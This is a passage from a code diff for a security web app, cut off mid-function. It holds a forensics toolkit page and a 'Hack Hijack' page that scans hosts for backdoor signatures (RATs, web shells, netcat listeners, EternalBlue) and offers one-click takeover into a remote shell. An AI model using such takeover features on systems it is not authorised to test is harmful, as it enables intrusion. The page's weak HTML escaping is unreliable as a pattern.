</div>
|
||||
</div>
|
||||
|
||||
<!-- Chain of Custody -->
|
||||
<div class="section">
|
||||
<h2>Chain of Custody Log</h2>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-small" onclick="forRefreshCustody()">Refresh</button>
|
||||
<button class="btn btn-small" onclick="forExportCustody()">Export</button>
|
||||
</div>
|
||||
<table class="data-table">
|
||||
<thead>
|
||||
<tr>
|
||||
<th>Timestamp</th>
|
||||
<th>Action</th>
|
||||
<th>Target</th>
|
||||
<th>Details</th>
|
||||
<th>Hash</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody id="for-custody-body">
|
||||
<tr><td colspan="5" class="empty-state">No chain of custody entries.</td></tr>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<script>
|
||||
/* ── Forensics Toolkit ── */
|
||||
function esc(s) { return String(s).replace(/&/g,'&').replace(/</g,'<'); }
|
||||
|
||||
var forCarvedFiles = [];
|
||||
var forTimelineEvents = [];
|
||||
var forTimelineSortKey = 'timestamp';
|
||||
var forTimelineSortAsc = true;
|
||||
|
||||
/* ── Image Tab ── */
|
||||
function forHashFile() {
|
||||
var path = document.getElementById('for-hash-path').value.trim();
|
||||
if (!path) return;
|
||||
var btn = document.getElementById('btn-for-hash');
|
||||
setLoading(btn, true);
|
||||
postJSON('/forensics/hash', {path: path}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) {
|
||||
document.getElementById('for-hash-result').style.display = 'none';
|
||||
return;
|
||||
}
|
||||
document.getElementById('for-hash-result').style.display = '';
|
||||
document.getElementById('for-hash-md5').textContent = data.md5 || '—';
|
||||
document.getElementById('for-hash-sha1').textContent = data.sha1 || '—';
|
||||
document.getElementById('for-hash-sha256').textContent = data.sha256 || '—';
|
||||
forLogCustody('hash', path, 'Computed hashes', data.sha256 || '');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function forVerifyHash() {
|
||||
var path = document.getElementById('for-verify-path').value.trim();
|
||||
var expected = document.getElementById('for-verify-hash').value.trim();
|
||||
if (!path || !expected) return;
|
||||
var btn = document.getElementById('btn-for-verify');
|
||||
setLoading(btn, true);
|
||||
postJSON('/forensics/verify', {path: path, expected: expected}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
var el = document.getElementById('for-verify-result');
|
||||
if (data.error) {
|
||||
el.textContent = 'Error: ' + data.error;
|
||||
el.style.color = 'var(--danger)';
|
||||
return;
|
||||
}
|
||||
if (data.match) {
|
||||
el.textContent = 'MATCH — Hash verified (' + (data.algorithm || 'unknown') + ')';
|
||||
el.style.color = 'var(--success,#4ade80)';
|
||||
} else {
|
||||
el.textContent = 'MISMATCH — Expected: ' + expected + ', Got: ' + (data.actual || '?');
|
||||
el.style.color = 'var(--danger)';
|
||||
}
|
||||
forLogCustody('verify', path, data.match ? 'Hash verified' : 'Hash mismatch', expected);
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function forCreateImage() {
|
||||
var source = document.getElementById('for-image-source').value.trim();
|
||||
var output = document.getElementById('for-image-output').value.trim();
|
||||
if (!source || !output) return;
|
||||
var btn = document.getElementById('btn-for-image');
|
||||
var log = document.getElementById('for-image-output-log');
|
||||
setLoading(btn, true);
|
||||
log.style.display = 'block';
|
||||
log.textContent = '';
|
||||
document.getElementById('for-image-status').textContent = 'Creating disk image...';
|
||||
postJSON('/forensics/create-image', {source: source, output: output}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) {
|
||||
document.getElementById('for-image-status').textContent = 'Error: ' + data.error;
|
||||
log.textContent = data.error;
|
||||
return;
|
||||
}
|
||||
document.getElementById('for-image-status').textContent = 'Image created successfully';
|
||||
var lines = [];
|
||||
if (data.size) lines.push('Size: ' + data.size);
|
||||
if (data.hash) lines.push('SHA256: ' + data.hash);
|
||||
if (data.duration) lines.push('Duration: ' + data.duration + 's');
|
||||
log.textContent = lines.join('\n') || 'Done.';
|
||||
forLogCustody('image', output, 'Disk image created from ' + source, data.hash || '');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
/* ── Carve Tab ── */
|
||||
function forGetCarveTypes() {
|
||||
var checked = [];
|
||||
document.querySelectorAll('.for-carve-type:checked').forEach(function(cb) {
|
||||
checked.push(cb.value);
|
||||
});
|
||||
return checked;
|
||||
}
|
||||
|
||||
function forCarve() {
|
||||
var source = document.getElementById('for-carve-source').value.trim();
|
||||
if (!source) return;
|
||||
var types = forGetCarveTypes();
|
||||
if (!types.length) { document.getElementById('for-carve-status').textContent = 'Select at least one file type'; return; }
|
||||
var maxFiles = parseInt(document.getElementById('for-carve-max').value) || 100;
|
||||
var btn = document.getElementById('btn-for-carve');
|
||||
setLoading(btn, true);
|
||||
document.getElementById('for-carve-status').textContent = 'Carving files from image...';
|
||||
postJSON('/forensics/carve', {source: source, types: types, max_files: maxFiles}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) {
|
||||
document.getElementById('for-carve-status').textContent = 'Error: ' + data.error;
|
||||
return;
|
||||
}
|
||||
forCarvedFiles = data.files || [];
|
||||
document.getElementById('for-carve-status').textContent = 'Carved ' + forCarvedFiles.length + ' file(s)';
|
||||
forRenderCarved();
|
||||
forLogCustody('carve', source, 'Carved ' + forCarvedFiles.length + ' files (' + types.join(',') + ')', '');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function forRenderCarved() {
|
||||
var tbody = document.getElementById('for-carved-body');
|
||||
if (!forCarvedFiles.length) {
|
||||
tbody.innerHTML = '<tr><td colspan="5" class="empty-state">No carved files.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
forCarvedFiles.forEach(function(f) {
|
||||
html += '<tr>'
|
||||
+ '<td>' + esc(f.name || '—') + '</td>'
|
||||
+ '<td>' + esc(f.type || '—') + '</td>'
|
||||
+ '<td style="font-family:monospace;font-size:0.8rem">' + esc(f.offset != null ? '0x' + f.offset.toString(16) : '—') + '</td>'
|
||||
+ '<td>' + esc(forFormatSize(f.size)) + '</td>'
|
||||
+ '<td style="font-family:monospace;font-size:0.8rem">' + esc(f.md5 || '—') + '</td>'
|
||||
+ '</tr>';
|
||||
});
|
||||
tbody.innerHTML = html;
|
||||
}
|
||||
|
||||
function forFormatSize(bytes) {
|
||||
if (bytes == null) return '—';
|
||||
if (bytes < 1024) return bytes + ' B';
|
||||
if (bytes < 1048576) return (bytes / 1024).toFixed(1) + ' KB';
|
||||
if (bytes < 1073741824) return (bytes / 1048576).toFixed(1) + ' MB';
|
||||
return (bytes / 1073741824).toFixed(2) + ' GB';
|
||||
}
|
||||
|
||||
function forExportCarved() {
|
||||
var blob = new Blob([JSON.stringify(forCarvedFiles, null, 2)], {type: 'application/json'});
|
||||
var a = document.createElement('a');
|
||||
a.href = URL.createObjectURL(blob);
|
||||
a.download = 'carved_files.json';
|
||||
a.click();
|
||||
}
|
||||
|
||||
function forClearCarved() {
|
||||
forCarvedFiles = [];
|
||||
forRenderCarved();
|
||||
}
|
||||
|
||||
/* ── Timeline Tab ── */
|
||||
function forBuildTimeline() {
|
||||
var path = document.getElementById('for-timeline-path').value.trim();
|
||||
if (!path) return;
|
||||
var btn = document.getElementById('btn-for-timeline');
|
||||
setLoading(btn, true);
|
||||
document.getElementById('for-timeline-status').textContent = 'Building timeline...';
|
||||
postJSON('/forensics/timeline', {path: path}).then(function(data) {
|
||||
setLoading(btn, false);
|
||||
if (data.error) {
|
||||
document.getElementById('for-timeline-status').textContent = 'Error: ' + data.error;
|
||||
return;
|
||||
}
|
||||
forTimelineEvents = data.events || [];
|
||||
document.getElementById('for-timeline-status').textContent = 'Timeline built — ' + forTimelineEvents.length + ' event(s)';
|
||||
forRenderTimeline();
|
||||
forLogCustody('timeline', path, 'Built timeline with ' + forTimelineEvents.length + ' events', '');
|
||||
}).catch(function() { setLoading(btn, false); });
|
||||
}
|
||||
|
||||
function forSortTimeline(key) {
|
||||
if (forTimelineSortKey === key) {
|
||||
forTimelineSortAsc = !forTimelineSortAsc;
|
||||
} else {
|
||||
forTimelineSortKey = key;
|
||||
forTimelineSortAsc = true;
|
||||
}
|
||||
forTimelineEvents.sort(function(a, b) {
|
||||
var va = a[key] || '', vb = b[key] || '';
|
||||
if (key === 'size') { va = Number(va) || 0; vb = Number(vb) || 0; }
|
||||
else { va = String(va).toLowerCase(); vb = String(vb).toLowerCase(); }
|
||||
if (va < vb) return forTimelineSortAsc ? -1 : 1;
|
||||
if (va > vb) return forTimelineSortAsc ? 1 : -1;
|
||||
return 0;
|
||||
});
|
||||
forRenderTimeline();
|
||||
}
|
||||
|
||||
function forRenderTimeline() {
|
||||
var tbody = document.getElementById('for-timeline-body');
|
||||
if (!forTimelineEvents.length) {
|
||||
tbody.innerHTML = '<tr><td colspan="4" class="empty-state">No timeline data.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
forTimelineEvents.forEach(function(e) {
|
||||
var typeCls = '';
|
||||
var t = (e.type || '').toLowerCase();
|
||||
if (t === 'created') typeCls = 'color:var(--success,#4ade80)';
|
||||
else if (t === 'modified') typeCls = 'color:var(--warning,#f59e0b)';
|
||||
else if (t === 'deleted') typeCls = 'color:var(--danger)';
|
||||
else if (t === 'accessed') typeCls = 'color:var(--accent)';
|
||||
html += '<tr>'
|
||||
+ '<td style="font-family:monospace;font-size:0.8rem;white-space:nowrap">' + esc(e.timestamp || '—') + '</td>'
|
||||
+ '<td><span style="' + typeCls + '">' + esc(e.type || '—') + '</span></td>'
|
||||
+ '<td style="max-width:350px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap">' + esc(e.file || '—') + '</td>'
|
||||
+ '<td>' + esc(forFormatSize(e.size)) + '</td>'
|
||||
+ '</tr>';
|
||||
});
|
||||
tbody.innerHTML = html;
|
||||
}
|
||||
|
||||
function forExportTimeline() {
|
||||
if (!forTimelineEvents.length) return;
|
||||
var csv = 'Timestamp,Type,File,Size\n';
|
||||
forTimelineEvents.forEach(function(e) {
|
||||
csv += '"' + (e.timestamp || '') + '","' + (e.type || '') + '","' + (e.file || '').replace(/"/g, '""') + '",' + (e.size || 0) + '\n';
|
||||
});
|
||||
var blob = new Blob([csv], {type: 'text/csv'});
|
||||
var a = document.createElement('a');
|
||||
a.href = URL.createObjectURL(blob);
|
||||
a.download = 'forensic_timeline.csv';
|
||||
a.click();
|
||||
}
|
||||
|
||||
/* ── Evidence Tab ── */
|
||||
var forCustodyLog = [];
|
||||
|
||||
function forRefreshEvidence() {
|
||||
fetchJSON('/forensics/evidence').then(function(data) {
|
||||
var container = document.getElementById('for-evidence-files');
|
||||
var files = data.files || [];
|
||||
if (!files.length) {
|
||||
container.innerHTML = '<p class="empty-state" style="padding:12px;font-size:0.85rem">No evidence files registered.</p>';
|
||||
} else {
|
||||
var html = '<table class="data-table"><thead><tr><th>File</th><th>Size</th><th>Hash</th><th>Added</th></tr></thead><tbody>';
|
||||
files.forEach(function(f) {
|
||||
html += '<tr>'
|
||||
+ '<td>' + esc(f.name || '—') + '</td>'
|
||||
+ '<td>' + esc(forFormatSize(f.size)) + '</td>'
|
||||
+ '<td style="font-family:monospace;font-size:0.8rem;max-width:200px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap">' + esc(f.hash || '—') + '</td>'
|
||||
+ '<td style="font-size:0.8rem">' + esc(f.added || '—') + '</td>'
|
||||
+ '</tr>';
|
||||
});
|
||||
html += '</tbody></table>';
|
||||
container.innerHTML = html;
|
||||
}
|
||||
|
||||
/* Also update carved files in evidence view */
|
||||
var carvedContainer = document.getElementById('for-evidence-carved');
|
||||
var carved = data.carved || forCarvedFiles;
|
||||
if (!carved.length) {
|
||||
carvedContainer.innerHTML = '<p class="empty-state" style="padding:12px;font-size:0.85rem">No carved files.</p>';
|
||||
} else {
|
||||
var chtml = '<table class="data-table"><thead><tr><th>Name</th><th>Type</th><th>Size</th><th>MD5</th></tr></thead><tbody>';
|
||||
carved.forEach(function(f) {
|
||||
chtml += '<tr>'
|
||||
+ '<td>' + esc(f.name || '—') + '</td>'
|
||||
+ '<td>' + esc(f.type || '—') + '</td>'
|
||||
+ '<td>' + esc(forFormatSize(f.size)) + '</td>'
|
||||
+ '<td style="font-family:monospace;font-size:0.8rem">' + esc(f.md5 || '—') + '</td>'
|
||||
+ '</tr>';
|
||||
});
|
||||
chtml += '</tbody></table>';
|
||||
carvedContainer.innerHTML = chtml;
|
||||
}
|
||||
}).catch(function() {});
|
||||
|
||||
forRefreshCustody();
|
||||
}
|
||||
|
||||
function forLogCustody(action, target, details, hash) {
|
||||
var entry = {
|
||||
timestamp: new Date().toISOString().replace('T', ' ').substring(0, 19),
|
||||
action: action,
|
||||
target: target,
|
||||
details: details,
|
||||
hash: hash
|
||||
};
|
||||
forCustodyLog.push(entry);
|
||||
postJSON('/forensics/custody/log', entry).catch(function() {});
|
||||
forRenderCustody();
|
||||
}
|
||||
|
||||
function forRefreshCustody() {
|
||||
fetchJSON('/forensics/custody').then(function(data) {
|
||||
if (data.entries && data.entries.length) {
|
||||
forCustodyLog = data.entries;
|
||||
}
|
||||
forRenderCustody();
|
||||
}).catch(function() { forRenderCustody(); });
|
||||
}
|
||||
|
||||
function forRenderCustody() {
|
||||
var tbody = document.getElementById('for-custody-body');
|
||||
if (!forCustodyLog.length) {
|
||||
tbody.innerHTML = '<tr><td colspan="5" class="empty-state">No chain of custody entries.</td></tr>';
|
||||
return;
|
||||
}
|
||||
var html = '';
|
||||
forCustodyLog.forEach(function(e) {
|
||||
html += '<tr>'
|
||||
+ '<td style="font-size:0.8rem;white-space:nowrap">' + esc(e.timestamp || '—') + '</td>'
|
||||
+ '<td><span class="badge" style="background:rgba(99,102,241,0.15);color:var(--accent)">' + esc(e.action || '—') + '</span></td>'
|
||||
+ '<td style="max-width:250px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap">' + esc(e.target || '—') + '</td>'
|
||||
+ '<td style="font-size:0.85rem">' + esc(e.details || '—') + '</td>'
|
||||
+ '<td style="font-family:monospace;font-size:0.75rem;max-width:180px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap">' + esc(e.hash || '—') + '</td>'
|
||||
+ '</tr>';
|
||||
});
|
||||
tbody.innerHTML = html;
|
||||
}
|
||||
|
||||
function forExportCustody() {
|
||||
var blob = new Blob([JSON.stringify(forCustodyLog, null, 2)], {type: 'application/json'});
|
||||
var a = document.createElement('a');
|
||||
a.href = URL.createObjectURL(blob);
|
||||
a.download = 'chain_of_custody.json';
|
||||
a.click();
|
||||
}
|
||||
|
||||
/* ── Init ── */
|
||||
document.addEventListener('DOMContentLoaded', function() {
|
||||
forRefreshEvidence();
|
||||
});
|
||||
</script>
|
||||
{% endblock %}
|
||||
391
web/templates/hack_hijack.html
Normal file
391
web/templates/hack_hijack.html
Normal file
@ -0,0 +1,391 @@
|
||||
{% extends "base.html" %}
|
||||
{% block title %}Hack Hijack — AUTARCH{% endblock %}
|
||||
{% block content %}
|
||||
<div class="page-header">
|
||||
<h1>Hack Hijack</h1>
|
||||
<p class="text-muted">Scan for existing compromises and take over backdoors</p>
|
||||
</div>
|
||||
|
||||
<div class="tabs">
|
||||
<button class="tab active" onclick="switchTab('scan')">Scan Target</button>
|
||||
<button class="tab" onclick="switchTab('results')">Results</button>
|
||||
<button class="tab" onclick="switchTab('sessions')">Sessions <span id="session-count" class="badge" style="display:none">0</span></button>
|
||||
<button class="tab" onclick="switchTab('history')">History</button>
|
||||
</div>
|
||||
|
||||
<!-- Scan Tab -->
|
||||
<div id="tab-scan" class="tab-content active">
|
||||
<div class="card" style="max-width:700px">
|
||||
<h3>Target Scan</h3>
|
||||
<div class="form-group">
|
||||
<label>Target IP Address</label>
|
||||
<input type="text" id="hh-target" class="form-control" placeholder="192.168.1.100">
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label>Scan Type</label>
|
||||
<select id="hh-scan-type" class="form-control" onchange="toggleCustomPorts()">
|
||||
<option value="quick">Quick — Backdoor signature ports only (~30 ports)</option>
|
||||
<option value="full">Full — All suspicious ports (~70 ports)</option>
|
||||
<option value="nmap">Nmap Deep — Service version + OS detection (requires nmap)</option>
|
||||
<option value="custom">Custom — Specify ports</option>
|
||||
</select>
|
||||
</div>
|
||||
<div class="form-group" id="custom-ports-group" style="display:none">
|
||||
<label>Custom Ports (comma-separated)</label>
|
||||
<input type="text" id="hh-custom-ports" class="form-control" placeholder="22,80,443,445,4444,8080">
|
||||
</div>
|
||||
<button id="hh-scan-btn" class="btn btn-primary" onclick="startScan()">Scan for Compromises</button>
|
||||
<div id="hh-scan-status" style="margin-top:1rem;display:none">
|
||||
<div class="spinner-inline"></div>
|
||||
<span id="hh-scan-msg">Scanning...</span>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="card" style="margin-top:1.5rem">
|
||||
<h3>What This Scans For</h3>
|
||||
<div style="display:grid;grid-template-columns:repeat(auto-fill,minmax(200px,1fr));gap:1rem;font-size:0.85rem">
|
||||
<div><strong style="color:var(--danger)">EternalBlue</strong><br>DoublePulsar SMB implant, MS17-010 vulnerability</div>
|
||||
<div><strong style="color:#f59e0b">RAT / C2</strong><br>Meterpreter, Cobalt Strike, njRAT, DarkComet, Quasar, AsyncRAT, Gh0st, Poison Ivy</div>
|
||||
<div><strong style="color:#6366f1">Shell Backdoors</strong><br>Netcat listeners, bind shells, telnet backdoors, rogue SSH</div>
|
||||
<div><strong style="color:#22c55e">Web Shells</strong><br>PHP/ASP/JSP shells on HTTP services</div>
|
||||
<div><strong style="color:#8b5cf6">Proxies</strong><br>SOCKS, HTTP proxies, tunnels used as pivot points</div>
|
||||
<div><strong style="color:#06b6d4">Miners</strong><br>Cryptocurrency mining stratum connections</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Results Tab -->
|
||||
<div id="tab-results" class="tab-content" style="display:none">
|
||||
<div id="hh-no-results" class="card" style="text-align:center;color:var(--text-muted)">
|
||||
No scan results yet. Run a scan from the Scan tab.
|
||||
</div>
|
||||
<div id="hh-results" style="display:none">
|
||||
<div class="card">
|
||||
<div style="display:flex;justify-content:space-between;align-items:center">
|
||||
<h3>Scan: <span id="res-target" style="color:var(--accent)"></span></h3>
|
||||
<span id="res-time" style="font-size:0.8rem;color:var(--text-muted)"></span>
|
||||
</div>
|
||||
<div style="display:flex;gap:2rem;margin:1rem 0;font-size:0.85rem">
|
||||
<div><strong id="res-ports-count">0</strong> open ports</div>
|
||||
<div><strong id="res-backdoors-count" style="color:var(--danger)">0</strong> backdoor indicators</div>
|
||||
<div>Duration: <strong id="res-duration">0</strong>s</div>
|
||||
<div id="res-os" style="display:none">OS: <strong id="res-os-text"></strong></div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Backdoors -->
|
||||
<div id="hh-backdoors-section" class="card" style="margin-top:1rem;display:none">
|
||||
<h3 style="color:var(--danger)">Backdoor Indicators</h3>
|
||||
<table class="data-table" style="margin-top:0.5rem">
|
||||
<thead><tr>
|
||||
<th>Confidence</th><th>Signature</th><th>Port</th>
|
||||
<th>Category</th><th>Details</th><th>Action</th>
|
||||
</tr></thead>
|
||||
<tbody id="hh-backdoors-body"></tbody>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<!-- SMB Info -->
|
||||
<div id="hh-smb-section" class="card" style="margin-top:1rem;display:none">
|
||||
<h3>SMB / EternalBlue</h3>
|
||||
<div id="hh-smb-info" style="font-size:0.85rem"></div>
|
||||
</div>
|
||||
|
||||
<!-- Open Ports -->
|
||||
<div class="card" style="margin-top:1rem">
|
||||
<h3>Open Ports</h3>
|
||||
<table class="data-table" style="margin-top:0.5rem">
|
||||
<thead><tr>
|
||||
<th>Port</th><th>Protocol</th><th>Service</th><th>Banner</th>
|
||||
</tr></thead>
|
||||
<tbody id="hh-ports-body"></tbody>
|
||||
</table>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Sessions Tab -->
|
||||
<div id="tab-sessions" class="tab-content" style="display:none">
|
||||
<div id="hh-no-sessions" class="card" style="text-align:center;color:var(--text-muted)">
|
||||
No active sessions. Take over a detected backdoor to start a session.
|
||||
</div>
|
||||
<div id="hh-sessions-list"></div>
|
||||
|
||||
<!-- Shell terminal -->
|
||||
<div id="hh-shell" class="card" style="margin-top:1rem;display:none">
|
||||
<div style="display:flex;justify-content:space-between;align-items:center">
|
||||
<h3>Shell: <span id="shell-target" style="color:var(--accent)"></span></h3>
|
||||
<button class="btn btn-sm" style="background:var(--danger);color:#fff" onclick="closeCurrentSession()">Disconnect</button>
|
||||
</div>
|
||||
<div id="shell-output" style="background:#0a0a0a;color:#0f0;font-family:monospace;font-size:0.8rem;
|
||||
padding:1rem;border-radius:var(--radius);height:400px;overflow-y:auto;white-space:pre-wrap;margin:0.5rem 0"></div>
|
||||
<div style="display:flex;gap:0.5rem;margin-top:0.5rem">
|
||||
<input type="text" id="shell-input" class="form-control" placeholder="Enter command..."
|
||||
onkeypress="if(event.key==='Enter')shellExec()" style="font-family:monospace">
|
||||
<button class="btn btn-primary" onclick="shellExec()">Run</button>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- History Tab -->
|
||||
<div id="tab-history" class="tab-content" style="display:none">
|
||||
<div style="display:flex;justify-content:space-between;align-items:center;margin-bottom:1rem">
|
||||
<h3>Scan History</h3>
|
||||
<button class="btn btn-sm" style="background:var(--danger);color:#fff" onclick="clearHistory()">Clear All</button>
|
||||
</div>
|
||||
<div id="hh-history-list"></div>
|
||||
</div>
|
||||
|
||||
<style>
|
||||
.badge{display:inline-block;background:var(--danger);color:#fff;border-radius:10px;padding:0 6px;font-size:0.7rem;margin-left:4px;vertical-align:top}
|
||||
.conf-high{color:var(--danger);font-weight:700}
|
||||
.conf-medium{color:#f59e0b;font-weight:600}
|
||||
.conf-low{color:var(--text-muted)}
|
||||
.spinner-inline{display:inline-block;width:14px;height:14px;border:2px solid var(--border);border-top-color:var(--accent);border-radius:50%;animation:spin 0.8s linear infinite;vertical-align:middle;margin-right:6px}
|
||||
@keyframes spin{to{transform:rotate(360deg)}}
|
||||
.cat-eternalblue{color:var(--danger)}
|
||||
.cat-rat{color:#f59e0b}
|
||||
.cat-shell{color:#6366f1}
|
||||
.cat-webshell{color:#22c55e}
|
||||
.cat-proxy{color:#8b5cf6}
|
||||
.cat-miner{color:#06b6d4}
|
||||
.cat-generic{color:var(--text-secondary)}
|
||||
</style>
|
||||
|
||||
<script>
|
||||
let currentScanResult = null;
|
||||
let currentSessionId = null;
|
||||
let pollTimer = null;
|
||||
|
||||
function switchTab(name){
|
||||
document.querySelectorAll('.tab').forEach((t,i)=>t.classList.toggle('active',
|
||||
['scan','results','sessions','history'][i]===name));
|
||||
document.querySelectorAll('.tab-content').forEach(c=>c.style.display='none');
|
||||
document.getElementById('tab-'+name).style.display='';
|
||||
if(name==='sessions') loadSessions();
|
||||
if(name==='history') loadHistory();
|
||||
}
|
||||
|
||||
function toggleCustomPorts(){
|
||||
document.getElementById('custom-ports-group').style.display=
|
||||
document.getElementById('hh-scan-type').value==='custom'?'':'none';
|
||||
}
|
||||
|
||||
function startScan(){
|
||||
const target=document.getElementById('hh-target').value.trim();
|
||||
if(!target){alert('Enter a target IP');return}
|
||||
const scanType=document.getElementById('hh-scan-type').value;
|
||||
let customPorts=[];
|
||||
if(scanType==='custom'){
|
||||
customPorts=document.getElementById('hh-custom-ports').value
|
||||
.split(',').map(p=>parseInt(p.trim())).filter(p=>p>0&&p<65536);
|
||||
if(!customPorts.length){alert('Enter valid ports');return}
|
||||
}
|
||||
document.getElementById('hh-scan-btn').disabled=true;
|
||||
document.getElementById('hh-scan-status').style.display='';
|
||||
document.getElementById('hh-scan-msg').textContent='Scanning '+target+'...';
|
||||
|
||||
fetch('/hack-hijack/scan',{method:'POST',headers:{'Content-Type':'application/json'},
|
||||
body:JSON.stringify({target,scan_type:scanType,custom_ports:customPorts})})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(!d.ok){showScanError(d.error);return}
|
||||
pollScan(d.job_id);
|
||||
}).catch(e=>showScanError(e.message));
|
||||
}
|
||||
|
||||
function pollScan(jobId){
|
||||
if(pollTimer) clearInterval(pollTimer);
|
||||
pollTimer=setInterval(()=>{
|
||||
fetch('/hack-hijack/scan/'+jobId).then(r=>r.json()).then(d=>{
|
||||
if(!d.done) return;
|
||||
clearInterval(pollTimer);pollTimer=null;
|
||||
document.getElementById('hh-scan-btn').disabled=false;
|
||||
document.getElementById('hh-scan-status').style.display='none';
|
||||
if(!d.ok){showScanError(d.error);return}
|
||||
currentScanResult=d.result;
|
||||
renderResults(d.result);
|
||||
switchTab('results');
|
||||
}).catch(()=>{});
|
||||
},1500);
|
||||
}
|
||||
|
||||
function showScanError(msg){
|
||||
document.getElementById('hh-scan-btn').disabled=false;
|
||||
document.getElementById('hh-scan-status').style.display='none';
|
||||
alert('Scan error: '+msg);
|
||||
}
|
||||
|
||||
function renderResults(r){
|
||||
document.getElementById('hh-no-results').style.display='none';
|
||||
document.getElementById('hh-results').style.display='';
|
||||
document.getElementById('res-target').textContent=r.target;
|
||||
document.getElementById('res-time').textContent=r.scan_time.replace('T',' ').slice(0,19)+' UTC';
|
||||
document.getElementById('res-ports-count').textContent=r.open_ports.length;
|
||||
document.getElementById('res-backdoors-count').textContent=r.backdoors.length;
|
||||
document.getElementById('res-duration').textContent=r.duration;
|
||||
if(r.os_guess){
|
||||
document.getElementById('res-os').style.display='';
|
||||
document.getElementById('res-os-text').textContent=r.os_guess;
|
||||
}
|
||||
|
||||
// Ports table
|
||||
const pb=document.getElementById('hh-ports-body');
|
||||
pb.innerHTML='';
|
||||
r.open_ports.forEach(p=>{
|
||||
const tr=document.createElement('tr');
|
||||
tr.innerHTML=`<td>${p.port}</td><td>${p.protocol}</td><td>${p.service||'—'}</td>
|
||||
<td style="font-family:monospace;font-size:0.75rem;max-width:400px;overflow:hidden;text-overflow:ellipsis">${esc(p.banner||'')}</td>`;
|
||||
pb.appendChild(tr);
|
||||
});
|
||||
|
||||
// Backdoors
|
||||
const bs=document.getElementById('hh-backdoors-section');
|
||||
const bb=document.getElementById('hh-backdoors-body');
|
||||
if(r.backdoors.length){
|
||||
bs.style.display='';
|
||||
bb.innerHTML='';
|
||||
r.backdoors.forEach((b,i)=>{
|
||||
const tr=document.createElement('tr');
|
||||
tr.innerHTML=`<td class="conf-${b.confidence}">${b.confidence.toUpperCase()}</td>
|
||||
<td>${esc(b.signature)}</td><td>${b.port}</td>
|
||||
<td><span class="cat-${b.category}">${b.category}</span></td>
|
||||
<td style="font-size:0.8rem">${esc(b.details)}</td>
|
||||
<td><button class="btn btn-sm btn-primary" onclick="tryTakeover(${i})">Takeover</button></td>`;
|
||||
bb.appendChild(tr);
|
||||
});
|
||||
} else {
|
||||
bs.style.display='none';
|
||||
}
|
||||
|
||||
// SMB
|
||||
const ss=document.getElementById('hh-smb-section');
|
||||
if(r.smb_info&&(r.smb_info.vulnerable||r.smb_info.os)){
|
||||
ss.style.display='';
|
||||
let html='';
|
||||
if(r.smb_info.vulnerable) html+='<p style="color:var(--danger);font-weight:700">MS17-010 (EternalBlue) VULNERABLE</p>';
|
||||
if(r.smb_info.os) html+=`<p>OS: ${esc(r.smb_info.os)}</p>`;
|
||||
if(r.smb_info.signing) html+=`<p>SMB Signing: ${esc(r.smb_info.signing)}</p>`;
|
||||
document.getElementById('hh-smb-info').innerHTML=html;
|
||||
} else {
|
||||
ss.style.display='none';
|
||||
}
|
||||
}
|
||||
|
||||
function tryTakeover(idx){
|
||||
if(!currentScanResult) return;
|
||||
const bd=currentScanResult.backdoors[idx];
|
||||
const host=currentScanResult.target;
|
||||
fetch('/hack-hijack/takeover',{method:'POST',headers:{'Content-Type':'application/json'},
|
||||
body:JSON.stringify({host,backdoor:{port:bd.port,takeover_method:bd.takeover_method}})})
|
||||
.then(r=>r.json()).then(d=>{
|
||||
if(d.session_id){
|
||||
currentSessionId=d.session_id;
|
||||
switchTab('sessions');
|
||||
openShell(d.session_id,host+':'+bd.port,d.initial_output||d.message||'');
|
||||
} else {
|
||||
alert(d.message||d.error||'Takeover result received');
|
||||
if(d.msf_command){
|
||||
// Copy MSF command to clipboard
|
||||
navigator.clipboard.writeText(d.msf_command).then(()=>{
|
||||
alert('MSF command copied to clipboard');
|
||||
}).catch(()=>{});
|
||||
}
|
||||
}
|
||||
}).catch(e=>alert('Error: '+e.message));
|
||||
}
|
||||
|
||||
function loadSessions(){
|
||||
fetch('/hack-hijack/sessions').then(r=>r.json()).then(d=>{
|
||||
const list=document.getElementById('hh-sessions-list');
|
||||
const badge=document.getElementById('session-count');
|
||||
const sessions=d.sessions||[];
|
||||
if(!sessions.length){
|
||||
document.getElementById('hh-no-sessions').style.display='';
|
||||
list.innerHTML='';
|
||||
badge.style.display='none';
|
||||
return;
|
||||
}
|
||||
document.getElementById('hh-no-sessions').style.display='none';
|
||||
badge.style.display='';badge.textContent=sessions.length;
|
||||
list.innerHTML=sessions.map(s=>`<div class="card" style="margin-bottom:0.5rem;cursor:pointer"
|
||||
onclick="openShell('${esc(s.session_id)}','${esc(s.host)}:${s.port}','')">
|
||||
<div style="display:flex;justify-content:space-between;align-items:center">
|
||||
<div><strong>${esc(s.type)}</strong> → ${esc(s.host)}:${s.port}</div>
|
||||
<div style="font-size:0.75rem;color:var(--text-muted)">${s.connected_at.slice(0,19)}</div>
|
||||
</div></div>`).join('');
|
||||
});
|
||||
}
|
||||
|
||||
function openShell(sessionId,label,initial){
|
||||
currentSessionId=sessionId;
|
||||
